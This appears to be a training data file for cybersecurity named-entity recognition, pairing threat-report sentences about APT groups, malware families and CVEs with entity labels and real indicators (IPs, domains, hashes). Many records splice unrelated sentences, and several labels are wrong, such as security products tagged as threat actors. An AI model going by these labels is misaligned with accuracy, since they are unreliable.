{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "TOOL: emails": [[307, 313]], "FILEPATH: Microsoft Word attachment": [[321, 346]], "VULNERABILITY: CVE-2017-0199": [[379, 392]], "MALWARE: ZeroT Trojan": [[407, 419]], "MALWARE: PlugX Remote Access Trojan": [[451, 477]], "MALWARE: RAT": [[480, 483]]}, "info": {"id": "cyberner_stix_train_007185", "source": "cyberner_stix_train"}}
{"text": "] today www [ . Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group . This sample ( aa873ed803ca800ce92a39d9a683c644 ) exhibited network traffic that does not match the earlier pattern and therefore may evade existing network traffic signatures designed to detect Ixeshe related infections . The web shell , named help.aspx ( MD5 : 4b3039cf227c611c45d2242d1228a121 ) , contained code to identify the presence of ( 1 ) FireEye xAgent , ( 2 ) CarbonBlack , or ( 3 ) CrowdStrike Falcon endpoint products and write the output of discovery .", "spans": {"ORGANIZATION: financial institutions": [[56, 78]], "THREAT_ACTOR: MoneyTaker group": [[152, 168]], "FILEPATH: aa873ed803ca800ce92a39d9a683c644": [[185, 217]], "MALWARE: Ixeshe": [[365, 371]], "THREAT_ACTOR: FireEye xAgent": [[519, 533]], "THREAT_ACTOR: CarbonBlack": [[542, 553]], "THREAT_ACTOR: CrowdStrike Falcon": [[565, 583]]}, "info": {"id": "cyberner_stix_train_007186", "source": "cyberner_stix_train"}}
{"text": "It should be noted that CosmicDuke does not interoperate with the second , embedded malware in any way other than by writing the malware to disk and executing it .", "spans": {"MALWARE: CosmicDuke": [[24, 34]]}, "info": {"id": "cyberner_stix_train_007187", "source": "cyberner_stix_train"}}
{"text": "C2 and Targeted Banks As described earlier , the C2 domain is kept in the app ’ s resources . We consider APT38 's operations more global and highly specialized for targeting the financial sector . For example , The code hunted for several security products to evade – including Kaspersky .", "spans": {"THREAT_ACTOR: APT38": [[106, 111]], "ORGANIZATION: financial sector": [[179, 195]], "ORGANIZATION: security products": [[240, 257]], "ORGANIZATION: Kaspersky": [[279, 288]]}, "info": {"id": "cyberner_stix_train_007188", "source": "cyberner_stix_train"}}
{"text": "DualToy is still active and we have detected over 8,000 unique samples belonging to this Trojan family to date . Indeed , we have detected various external tools being abused by Okrum , such as a keylogger , tools for dumping passwords , or enumerating network sessions . North Korean group definitions are known to have significant overlap , and the name Lazarus Group is known to encompass a broad range of activity .", "spans": {"MALWARE: DualToy": [[0, 7]], "THREAT_ACTOR: Okrum": [[178, 183]], "TOOL: keylogger": [[196, 205]], "TOOL: tools": [[208, 213]], "TOOL: enumerating network sessions": [[241, 269]], "THREAT_ACTOR: Lazarus Group": [[356, 369]]}, "info": {"id": "cyberner_stix_train_007189", "source": "cyberner_stix_train"}}
{"text": "The WICKED PANDA adversary makes use of a number of open-source and custom tools to infect and move laterally in victim networks . The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware .", "spans": {"THREAT_ACTOR: WICKED PANDA": [[4, 16]], "TOOL: custom tools": [[68, 80]], "THREAT_ACTOR: Sofacy group": [[135, 147]], "TOOL: Flash": [[191, 196]], "VULNERABILITY: exploits": [[197, 205]], "MALWARE: Carberp": [[223, 230]], "MALWARE: JHUHUGIT downloaders": [[237, 257]]}, "info": {"id": "cyberner_stix_train_007190", "source": "cyberner_stix_train"}}
{"text": "CTU researchers and Secureworks incident responders have observed BRONZE PRESIDENT using the following tools , along with several custom batch scripts for locating and archiving specific file types :", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: BRONZE PRESIDENT": [[66, 82]]}, "info": {"id": "cyberner_stix_train_007191", "source": "cyberner_stix_train"}}
{"text": "The attackers then began to perform reconnaissance activities on Computer A via cmd.exe , collecting system-related information , such as the OS version , hardware configuration , and network information . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 .", "spans": {"MALWARE: cmd.exe": [[80, 87]], "THREAT_ACTOR: Buhtrap": [[206, 213]], "ORGANIZATION: financial institutions": [[279, 301]]}, "info": {"id": "cyberner_stix_train_007192", "source": "cyberner_stix_train"}}
{"text": "In April 2015 , we uncovered the malicious efforts of APT30 , a suspected China-based threat group that has exploited the networks of governments and organizations across the region , targeting highly sensitive political , economic and military information . In addition to spreading malware via spear fishing email with Office attachment containing either vulnerability or malicious macro , this group is particularly good at leveraging malicious Android APKs in the target attacks .", "spans": {"THREAT_ACTOR: APT30": [[54, 59]], "ORGANIZATION: governments": [[134, 145]], "ORGANIZATION: organizations": [[150, 163]], "ORGANIZATION: sensitive political": [[201, 220]], "ORGANIZATION: economic": [[223, 231]], "ORGANIZATION: military": [[236, 244]], "MALWARE: Android APKs": [[448, 460]]}, "info": {"id": "cyberner_stix_train_007193", "source": "cyberner_stix_train"}}
{"text": "Proofpoint researchers track a wide range of threat actors involved in both financially motivated cybercrime and state-sponsored actions .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]]}, "info": {"id": "cyberner_stix_train_007194", "source": "cyberner_stix_train"}}
{"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . Threat actors like Confucius and Patchwork are known for their large arsenal of tools and ever-evolving techniques that can render traditional security solutions — which are often not designed to handle the persistent and sophisticated threats detailed in this blog — ineffective .", "spans": {"MALWARE: TajMahal": [[37, 45]], "THREAT_ACTOR: Confucius": [[151, 160]], "THREAT_ACTOR: Patchwork": [[165, 174]]}, "info": {"id": "cyberner_stix_train_007195", "source": "cyberner_stix_train"}}
{"text": "If the package name of the foreground app is included in the target list , an overlay is shown . Recorded Future has actively tracked APT10 for several years , focusing specifically on the group’s targeting of MSPs and global internet infrastructure providers since the Operation Cloud Hopper report in 2017 . According to the debug path in the body , the author of the tool called it “ NamelessHdoor , ” and its internal version is identified as “ V1.5. ”", "spans": {"ORGANIZATION: Recorded Future": [[97, 112]], "THREAT_ACTOR: APT10": [[134, 139]], "MALWARE: NamelessHdoor": [[387, 400]]}, "info": {"id": "cyberner_stix_train_007196", "source": "cyberner_stix_train"}}
{"text": "looks like it was created for manual operator control . Since at least 2013 , HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government , financial , automotive , and media industries . APT33 : 95.211.191.117 update-sec.com . We have observed some lower degrees of confidence overlaps in post - exploitation stages among these UNC groups , like using the same recon commands and utilities available on Windows .", "spans": {"THREAT_ACTOR: HIDDEN COBRA actors": [[78, 97]], "TOOL: Volgmer malware": [[123, 138]], "ORGANIZATION: government": [[165, 175]], "ORGANIZATION: financial": [[178, 187]], "ORGANIZATION: automotive": [[190, 200]], "ORGANIZATION: media industries": [[207, 223]], "THREAT_ACTOR: APT33": [[226, 231]], "IP_ADDRESS: 95.211.191.117": [[234, 248]], "DOMAIN: update-sec.com": [[249, 263]]}, "info": {"id": "cyberner_stix_train_007197", "source": "cyberner_stix_train"}}
{"text": "Downeks can be instructed by the C2 to perform a few other commands :", "spans": {"MALWARE: Downeks": [[0, 7]], "TOOL: C2": [[33, 35]]}, "info": {"id": "cyberner_stix_train_007198", "source": "cyberner_stix_train"}}
{"text": "Once the keyword is present , the SDK will switch from innocent ads server to malicious payload delivery ones . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 . The goal of the campaign is to capture credit card data from guests and travelers stored in hotel systems , as well as credit card data received from popular online travel agencies ( OTAs ) such as Booking.com . The final payloads include the AgentTesla remote access trojan ( RAT ) , Cobalt Strike beacons and njRAT .", "spans": {"TOOL: sctrls backdoor": [[116, 131]], "VULNERABILITY: CVE-2015-1641": [[185, 198]], "ORGANIZATION: online travel agencies": [[359, 381]], "ORGANIZATION: OTAs": [[384, 388]], "DOMAIN: Booking.com": [[399, 410]], "MALWARE: AgentTesla remote access trojan ( RAT": [[444, 481]], "TOOL: Cobalt Strike": [[486, 499]], "TOOL: njRAT": [[512, 517]]}, "info": {"id": "cyberner_stix_train_007199", "source": "cyberner_stix_train"}}
{"text": "] top/7 * * * * * 3 ” ( Fr . APT33 is the only group that Kaspersky has observed use the DROPSHOT dropper . The developer used the Microsoft Winsocks API to handle the network connection .", "spans": {"THREAT_ACTOR: APT33": [[29, 34]], "ORGANIZATION: Kaspersky": [[58, 67]], "TOOL: DROPSHOT dropper": [[89, 105]], "TOOL: Microsoft Winsocks API": [[131, 153]]}, "info": {"id": "cyberner_stix_train_007200", "source": "cyberner_stix_train"}}
{"text": "Figure 7 . For example , we analyzed a DropIt sample ( SHA256 : cca268c13885ad5751eb70371bbc9ce8c8795654fedb90d9e3886cbcfe323671 ) that dropped two executables , one of which was saved to \" %TEMP%\\flash_update.exe \" that was a legitimate Flash Player installer . Once decoded , decrypted , and executed , an obfuscated loader will load one of the APT32 backdoors . They also added a new user for persistence and used the Wput tool to exfiltrate the victims files to their own FTP server .", "spans": {"TOOL: DropIt sample": [[39, 52]], "MALWARE: %TEMP%\\flash_update.exe": [[190, 213]], "TOOL: Flash Player installer": [[238, 260]], "THREAT_ACTOR: APT32": [[347, 352]], "TOOL: Wput": [[421, 425]]}, "info": {"id": "cyberner_stix_train_007201", "source": "cyberner_stix_train"}}
{"text": "That is why Microsoft has been working to extend its industry-leading endpoint protection capabilities beyond Windows . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks . The modified code will consider this . Kaspersky ’s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": {"ORGANIZATION: Microsoft": [[12, 21]], "SYSTEM: Windows": [[110, 117]], "ORGANIZATION: Unit 42": [[147, 154]], "THREAT_ACTOR: Gorgon Group": [[266, 278]], "ORGANIZATION: Kaspersky ’s Global Research and Analysis Team ( GReAT )": [[354, 410]]}, "info": {"id": "cyberner_stix_train_007202", "source": "cyberner_stix_train"}}
{"text": "'' Strazzere 's experience in trying to contact both vendors last year is typical of the frustrations frequently faced by security researchers . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft’s Equation Editor (EQNEDT32) . Custom Gh0st : 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40 .", "spans": {"MALWARE: RTF files": [[197, 206]], "VULNERABILITY: CVE-2018-0798": [[227, 240]], "MALWARE: Custom Gh0st": [[299, 311]], "FILEPATH: 8e5a0a5f733f62712b840e7f5051a2bd68508ea207e582a190c8947a06e26f40": [[314, 378]]}, "info": {"id": "cyberner_stix_train_007203", "source": "cyberner_stix_train"}}
{"text": "Several Mandiant investigations revealed that , after gaining access , APT32 regularly cleared select event log entries and heavily obfuscated their PowerShell-based tools and shellcode loaders with Daniel Bohannon’s Invoke-Obfuscation framework . Based on analysis of the data and malware samples we have collected , Unit 42 believes the attacks described herein are the work of a group or set of cooperating groups who have a single mission , collecting information on minority groups who reside in and around northwestern China .", "spans": {"ORGANIZATION: Mandiant": [[8, 16]], "THREAT_ACTOR: APT32": [[71, 76]], "TOOL: PowerShell-based tools": [[149, 171]], "ORGANIZATION: Unit 42": [[318, 325]], "THREAT_ACTOR: groups": [[410, 416]], "ORGANIZATION: minority groups": [[471, 486]]}, "info": {"id": "cyberner_stix_train_007204", "source": "cyberner_stix_train"}}
{"text": "One theory is that the botnets were a criminal side business for the Dukes group .", "spans": {"THREAT_ACTOR: Dukes": [[69, 74]]}, "info": {"id": "cyberner_stix_train_007205", "source": "cyberner_stix_train"}}
{"text": "The researchers say the malware uses the unusually tight control it gains over infected devices to create windfall profits and steadily increase its numbers . The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America . APT33 : 8.26.21.117 srvhost.servehttp.com . \" Indicators of attack IoAs refer to the series of behaviors that a cybercriminal exhibits prior to executing a cyberattack .", "spans": {"THREAT_ACTOR: cybercriminal group": [[163, 182]], "THREAT_ACTOR: Lazarus": [[183, 190]], "ORGANIZATION: financial organizations": [[218, 241]], "THREAT_ACTOR: APT33": [[270, 275]], "IP_ADDRESS: 8.26.21.117": [[278, 289]], "DOMAIN: srvhost.servehttp.com": [[290, 311]]}, "info": {"id": "cyberner_stix_train_007206", "source": "cyberner_stix_train"}}
{"text": "PUTTER PANDA is likely to continue to aggressively target Western entities that hold valuable information or intellectual property relevant to these interests . Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[0, 12]], "FILEPATH: BalkanRAT": [[166, 175]], "FILEPATH: BalkanDoor": [[180, 190]]}, "info": {"id": "cyberner_stix_train_007207", "source": "cyberner_stix_train"}}
{"text": "This entry was posted on Fri Mar 16 00:00 EDT 2018 and filed under Targeted Attacks , FireEye , and China . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August .", "spans": {"ORGANIZATION: FireEye": [[86, 93]], "FILEPATH: Locky": [[151, 156]], "TOOL: email": [[208, 213]]}, "info": {"id": "cyberner_stix_train_007208", "source": "cyberner_stix_train"}}
{"text": "For example , Trojan.Shunnael ( aka X-Tunnel ) , malware used to maintain access to infected networks using an encrypted tunnel , underwent a rewrite to .NET .", "spans": {"FILEPATH: Trojan.Shunnael": [[14, 29]], "MALWARE: X-Tunnel": [[36, 44]], "TOOL: .NET": [[153, 157]]}, "info": {"id": "cyberner_stix_train_007210", "source": "cyberner_stix_train"}}
{"text": "This ' connection bouncer ' tool lets the threat actor redirect ports and connections between different networks and obfuscate C2 server traffic . The computers of diplomats , military attachés , private assistants , secretaries to Prime Ministers , journalists and others are under the concealed control of unknown assailant (s ) .", "spans": {"TOOL: connection bouncer": [[7, 25]], "THREAT_ACTOR: threat actor": [[42, 54]], "ORGANIZATION: diplomats": [[164, 173]], "ORGANIZATION: military attachés": [[176, 193]], "ORGANIZATION: private assistants": [[196, 214]], "ORGANIZATION: secretaries": [[217, 228]], "ORGANIZATION: Prime Ministers": [[232, 247]], "ORGANIZATION: journalists": [[250, 261]]}, "info": {"id": "cyberner_stix_train_007211", "source": "cyberner_stix_train"}}
{"text": "The group has performed these activities at multiple locations across Brazil , possibly using multiple mules . Turla is a notorious group that has been targeting government officials .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "THREAT_ACTOR: Turla": [[111, 116]], "ORGANIZATION: government officials": [[162, 182]]}, "info": {"id": "cyberner_stix_train_007212", "source": "cyberner_stix_train"}}
{"text": "The malicious application is on the left-hand side . We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored .", "spans": {"THREAT_ACTOR: BITTER APT": [[70, 80]], "ORGANIZATION: government": [[106, 116]], "THREAT_ACTOR: APT33": [[248, 253]], "ORGANIZATION: aerospace": [[296, 305]], "ORGANIZATION: energy": [[310, 316]]}, "info": {"id": "cyberner_stix_train_007213", "source": "cyberner_stix_train"}}
{"text": "Finished ! Had more ccTLDs implemented security features such as registrar locks , attackers would be unable to redirect the targeted domains . APT38 APT38 is a financially-motivated threat group that is backed by the North Korean regime .", "spans": {"THREAT_ACTOR: attackers": [[83, 92]], "THREAT_ACTOR: APT38": [[144, 149], [150, 155]]}, "info": {"id": "cyberner_stix_train_007214", "source": "cyberner_stix_train"}}
{"text": "The group used malware with keylogging capabilities to monitor the computer of an executive who manages the company 's relationships with other telecommunications companies . Analysis of TG-3390 's operations , targeting , and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China .", "spans": {"ORGANIZATION: telecommunications companies": [[144, 172]], "THREAT_ACTOR: TG-3390": [[187, 194]], "ORGANIZATION: CTU": [[237, 240]], "ORGANIZATION: People's Republic": [[316, 333]]}, "info": {"id": "cyberner_stix_train_007215", "source": "cyberner_stix_train"}}
{"text": "MD5 b84b66bcdecd4b4529014619ed649d76 SHA1 fef1725ad72e4ef0432f8cb0cb73bf7ead339a7c Algorithm sha1 With RSA Encryption .", "spans": {"FILEPATH: b84b66bcdecd4b4529014619ed649d76": [[4, 36]], "FILEPATH: fef1725ad72e4ef0432f8cb0cb73bf7ead339a7c": [[42, 82]]}, "info": {"id": "cyberner_stix_train_007216", "source": "cyberner_stix_train"}}
{"text": "It will use either a standard web request or it will write data into a web socket if the first method fails . A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor . However , we asses with medium confidence that NavRAT is linked to Group123 .", "spans": {"THREAT_ACTOR: ITG08": [[143, 148]], "TOOL: More_eggs JScript backdoor": [[172, 198]], "MALWARE: NavRAT": [[248, 254]], "THREAT_ACTOR: Group123": [[268, 276]]}, "info": {"id": "cyberner_stix_train_007217", "source": "cyberner_stix_train"}}
{"text": "The dates were all fairly recent , having been received in the past few days since the beginning of August .", "spans": {}, "info": {"id": "cyberner_stix_train_007218", "source": "cyberner_stix_train"}}
{"text": "All 3 samples were compiled with the same timestamp .", "spans": {}, "info": {"id": "cyberner_stix_train_007219", "source": "cyberner_stix_train"}}
{"text": "Symantec also observed attempts by Leafminer to scan for the Heartbleed vulnerability ( CVE-2014-0160 ) from an attacker-controlled IP address . From February to September 2016 , WhiteBear activity was narrowly focused on embassies and consular operations around the world .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "THREAT_ACTOR: Leafminer": [[35, 44]], "VULNERABILITY: Heartbleed vulnerability": [[61, 85]], "VULNERABILITY: CVE-2014-0160": [[88, 101]], "ORGANIZATION: embassies": [[222, 231]]}, "info": {"id": "cyberner_stix_train_007220", "source": "cyberner_stix_train"}}
{"text": "A Russian security firm 'Doctor Web ' identified the first mass distributed Android bootkit malware called 'Android.Oldboot ' , a piece of malware that 's designed to re-infect devices after reboot , even if you delete all working components of it . Some time ago , a Kaspersky Lab customer in Latin America contacted us to say he had visited China and suspected his machine was infected with an unknown , undetected malware . We believe that APT1 is able to wage such a long-running and extensive cyber espionage campaign in large part because it receives direct government support . The exploits are located in separate web pages .", "spans": {"ORGANIZATION: Web": [[32, 35]], "SYSTEM: Android": [[76, 83]], "ORGANIZATION: Kaspersky Lab": [[268, 281]], "THREAT_ACTOR: APT1": [[443, 447]]}, "info": {"id": "cyberner_stix_train_007221", "source": "cyberner_stix_train"}}
{"text": "Once the backdoor sends basic information about its newly compromised system , the operators take control of the backdoor and start to send commands right away .", "spans": {}, "info": {"id": "cyberner_stix_train_007222", "source": "cyberner_stix_train"}}
{"text": "Patterning such as reuse of WHOIS artifacts , IP reuse , or even domain name themes are common and regularly used to group attacks to specific campaigns .", "spans": {"TOOL: WHOIS": [[28, 33]]}, "info": {"id": "cyberner_stix_train_007223", "source": "cyberner_stix_train"}}
{"text": "It prompts the user to download a file that supposedly contains the full article .", "spans": {}, "info": {"id": "cyberner_stix_train_007224", "source": "cyberner_stix_train"}}
{"text": "Corrupted archive privapp.txt Looks like a list of system applications ( including spyware components ) from the infected device run-as.x run-as.y Run-as tool ELF file SuperSU config fragment for implant components and the busybox tool supersu.cfg : This config allows the implant to use all root features silently . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity . APT33 : 8.26.21.120 mynetwork.ddns.net . The ThreatConnect Platform centralizes threat intelligence , automates key activities and enables information sharing across the internal security organization and with external partners .", "spans": {"ORGANIZATION: DHS": [[317, 320]], "ORGANIZATION: FBI": [[325, 328]], "THREAT_ACTOR: APT33": [[455, 460]], "IP_ADDRESS: 8.26.21.120": [[463, 474]], "DOMAIN: mynetwork.ddns.net": [[475, 493]], "TOOL: ThreatConnect Platform": [[500, 522]]}, "info": {"id": "cyberner_stix_train_007225", "source": "cyberner_stix_train"}}
{"text": "While we became initially curious because the hacktool was signed , we became more suspicious when we realized a mobile software developer had signed it , since this is not the type of software typically associated with a mobile application .", "spans": {}, "info": {"id": "cyberner_stix_train_007226", "source": "cyberner_stix_train"}}
{"text": "Quasar mutex name : VMFvdCsC7RFqerZinfV0sxJFo .", "spans": {"MALWARE: Quasar": [[0, 6]], "FILEPATH: VMFvdCsC7RFqerZinfV0sxJFo": [[20, 45]]}, "info": {"id": "cyberner_stix_train_007227", "source": "cyberner_stix_train"}}
{"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "TOOL: RTF": [[132, 135]], "VULNERABILITY: CVE-2017-1882": [[155, 168]], "FILEPATH: eqnedt32.exe": [[172, 184]]}, "info": {"id": "cyberner_stix_train_007228", "source": "cyberner_stix_train"}}
{"text": "C2 server : app.progsupdate.com , which resolved to 185.141.25.68 ) , over port 4664 .", "spans": {"TOOL: C2": [[0, 2]], "DOMAIN: app.progsupdate.com": [[12, 31]], "IP_ADDRESS: 185.141.25.68": [[52, 65]]}, "info": {"id": "cyberner_stix_train_007229", "source": "cyberner_stix_train"}}
{"text": "We recently observed a resurgence of the same phishing campaign when our systems detected roughly 90 phony Apple-like domains that were registered from July 2016 to September 2016 . The targeting of this individual suggests the actors are interested in breaching the French Ministry of Foreign Affairs itself or gaining insights into relations between France and Taiwan .", "spans": {"ORGANIZATION: individual": [[204, 214]], "THREAT_ACTOR: actors": [[228, 234]]}, "info": {"id": "cyberner_stix_train_007230", "source": "cyberner_stix_train"}}
{"text": "The Spark backdoor allows the attackers to :", "spans": {"MALWARE: Spark backdoor": [[4, 18]]}, "info": {"id": "cyberner_stix_train_007231", "source": "cyberner_stix_train"}}
{"text": "This exploit delivers a malware variant that shares characteristics with the APT28 backdoors CHOPSTICK and CORESHELL malware families , both described in our APT28 whitepaper .", "spans": {"THREAT_ACTOR: APT28": [[77, 82], [158, 163]], "MALWARE: CHOPSTICK": [[93, 102]], "MALWARE: CORESHELL": [[107, 116]]}, "info": {"id": "cyberner_stix_train_007233", "source": "cyberner_stix_train"}}
{"text": "Using our Farsight DNSDB integration , we identified other domains currently and previously hosted on the same IP .", "spans": {"ORGANIZATION: Farsight": [[10, 18]], "TOOL: DNSDB": [[19, 24]]}, "info": {"id": "cyberner_stix_train_007234", "source": "cyberner_stix_train"}}
{"text": "In doing so , users can become victims to malicious apps portraying themselves as the original app . Although both examples of the different delivery methods described above show an exclusive targeting of Russian speakers , the recurring financial and political themes that they use highlight the attacker's interest in the financial world once more . When executed , it will register symbols for multiple commonly used functions , including : open() , rmdir() , and unlink() , and modify their returns to hide the malware ’s operations .", "spans": {"THREAT_ACTOR: attacker's": [[297, 307]], "ORGANIZATION: financial": [[324, 333]], "TOOL: open()": [[444, 450]], "TOOL: rmdir()": [[453, 460]], "TOOL: unlink()": [[467, 475]]}, "info": {"id": "cyberner_stix_train_007235", "source": "cyberner_stix_train"}}
{"text": "Below is a table with the compile date and some PDB strings found within a few of the binaries .", "spans": {}, "info": {"id": "cyberner_stix_train_007236", "source": "cyberner_stix_train"}}
{"text": "For example , Svpeng uses a previously unknown vulnerability to protect itself from being removed manually or by the antivirus program . The group used a number of tools common to other Chinese hacking groups , but they had a few unique tools of their own with interfaces developed for Standard ( Simplified ) Chinese . The decrypted payload is the usual shellcode responsible for ShadowPad initialization ( obfuscated using fake conditional jumps to hinder disassembly ) . The threat of Iranian cyber operations continues to rise as challenges in relation to the renewal of the 2015 Iranian Nuclear Deal persist and regional tensions , specifically between Israel and Iran , escalate .", "spans": {"MALWARE: Svpeng": [[14, 20]], "TOOL: shellcode": [[355, 364]], "MALWARE: ShadowPad": [[381, 390]], "THREAT_ACTOR: Iranian cyber operations": [[488, 512]], "ORGANIZATION: Iranian Nuclear Deal": [[584, 604]], "ORGANIZATION: Israel": [[658, 664]], "ORGANIZATION: Iran": [[669, 673]]}, "info": {"id": "cyberner_stix_train_007237", "source": "cyberner_stix_train"}}
{"text": "They took advantage of the Syrian military conflict for thematic content and file naming “ Trump ’s_Attack_on_Syria_English.docx ” .", "spans": {"FILEPATH: Trump ’s_Attack_on_Syria_English.docx": [[91, 128]]}, "info": {"id": "cyberner_stix_train_007238", "source": "cyberner_stix_train"}}
{"text": "However , Poseidon 's practice of being a ' custom-tailored malware implants boutique ' kept security researchers from connecting different campaigns under the umbrella of a single threat actor . These attacks are primarily targeting private industry in search of key intellectual property for competitive advantage , military institutions , and governmental organizations often in search of documents related to current political events and human rights organizations .", "spans": {"THREAT_ACTOR: Poseidon": [[10, 18]], "THREAT_ACTOR: threat actor": [[181, 193]], "ORGANIZATION: private industry": [[234, 250]], "ORGANIZATION: military institutions": [[318, 339]], "ORGANIZATION: governmental organizations": [[346, 372]], "ORGANIZATION: political": [[421, 430]], "ORGANIZATION: human rights organizations": [[442, 468]]}, "info": {"id": "cyberner_stix_train_007239", "source": "cyberner_stix_train"}}
{"text": "The Stage-1 downloader will download and execute a new downloader , written in C++ , not so different from other Zebrocy downloaders .", "spans": {"TOOL: C++": [[79, 82]], "MALWARE: Zebrocy": [[113, 120]]}, "info": {"id": "cyberner_stix_train_007240", "source": "cyberner_stix_train"}}
{"text": "Group-IB specialists detected various sites used by criminals to spread the Trojan : mail tracking websites , news portals , electronic books , computer graphics resources , music portals , etc . In addition to using SWCs to target specific types of organizations , TG-3390 uses spearphishing emails to target specific victims .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "TOOL: mail tracking websites": [[85, 107]], "TOOL: news portals": [[110, 122]], "TOOL: electronic books": [[125, 141]], "TOOL: computer graphics resources": [[144, 171]], "TOOL: music portals": [[174, 187]], "MALWARE: SWCs": [[217, 221]], "THREAT_ACTOR: TG-3390": [[266, 273]], "TOOL: emails": [[293, 299]]}, "info": {"id": "cyberner_stix_train_007241", "source": "cyberner_stix_train"}}
{"text": "This apparent disregard for publicity suggests , in our opinion , that the benefactors of the Dukes is so powerful and so tightly connected to the group that the Dukes are able to operate with no apparent fear of repercussions on getting caught .", "spans": {"THREAT_ACTOR: Dukes": [[94, 99], [162, 167]]}, "info": {"id": "cyberner_stix_train_007242", "source": "cyberner_stix_train"}}
{"text": "In June 2017 , QiAnXin discovered new malware used by Molerats . We identified decoy files which indicate these attacks began with spear phishing messages but have not observed the actual messages .", "spans": {"ORGANIZATION: QiAnXin": [[15, 22]], "THREAT_ACTOR: Molerats": [[54, 62]], "FILEPATH: decoy files": [[79, 90]]}, "info": {"id": "cyberner_stix_train_007243", "source": "cyberner_stix_train"}}
{"text": "In this situation , Word will present the same lure document to the victim as seen in Figure 2 , but without the ability to enable macros via an Enable Content button .", "spans": {"TOOL: Word": [[20, 24]], "TOOL: macros": [[131, 137]], "TOOL: Enable Content button": [[145, 166]]}, "info": {"id": "cyberner_stix_train_007244", "source": "cyberner_stix_train"}}
{"text": "July 28 A recent campaign compromised Taiwan and Hong Kong sites to deliver Flash exploits related to Hacking Team . Other public tools used by the CopyKittens are Metasploit , a well-known free and open source framework for developing and executing exploit code against a remote target machine ; Mimikatz , a post-exploitation tool that performs credential dumping ; and Empire , a PowerShell and Python post-exploitation agent . In this case , FULLHOUSE.DOORED is a backdoor written in C / C++ that communicates using HTTP .", "spans": {"SYSTEM: Flash": [[76, 81]], "ORGANIZATION: Hacking Team": [[102, 114]], "THREAT_ACTOR: CopyKittens": [[148, 159]], "TOOL: Metasploit": [[164, 174]], "TOOL: Mimikatz": [[297, 305]], "TOOL: Empire": [[372, 378]], "TOOL: PowerShell": [[383, 393]], "MALWARE: FULLHOUSE.DOORED": [[446, 462]]}, "info": {"id": "cyberner_stix_train_007245", "source": "cyberner_stix_train"}}
{"text": "] somtum [ . Trend Micro specifically noted that the 2013 versions of KeyBoy used the same algorithm for encoding their configuration files as was observed in the Operation Tropic Trooper malware . The previous versions of Aumlib had not changed since at least May 2011, and Ixeshe had not evolved since at least December 2011 . Malwarebytes customers are protected as we detect the infrastructure and final payload used in these attacks .", "spans": {"ORGANIZATION: Trend Micro": [[13, 24]], "TOOL: KeyBoy": [[70, 76]], "MALWARE: Aumlib": [[223, 229]], "ORGANIZATION: Malwarebytes": [[329, 341]]}, "info": {"id": "cyberner_stix_train_007246", "source": "cyberner_stix_train"}}
{"text": "UNIQUE FEATURES BY VERSION EventBot Version 0.0.0.1 RC4 and Base64 Packet Encryption EventBot RC4 and Base64 data decryption from the C2 RC4 and Base64 data decryption from the C2 . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 . These emails included recruitment-themed lures and links to malicious HTML Application files .", "spans": {"MALWARE: EventBot": [[27, 35], [85, 93]], "MALWARE: sample": [[187, 193]], "MALWARE: Trochilus": [[213, 222]], "TOOL: emails": [[438, 444]], "TOOL: HTML Application": [[502, 518]]}, "info": {"id": "cyberner_stix_train_007247", "source": "cyberner_stix_train"}}
{"text": "The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign . Continued WhiteBear activity later shifted to include defense-related organizations into June 2017 .", "spans": {"VULNERABILITY: CVE-2017-8759": [[26, 39]], "ORGANIZATION: defense-related organizations": [[169, 198]]}, "info": {"id": "cyberner_stix_train_007248", "source": "cyberner_stix_train"}}
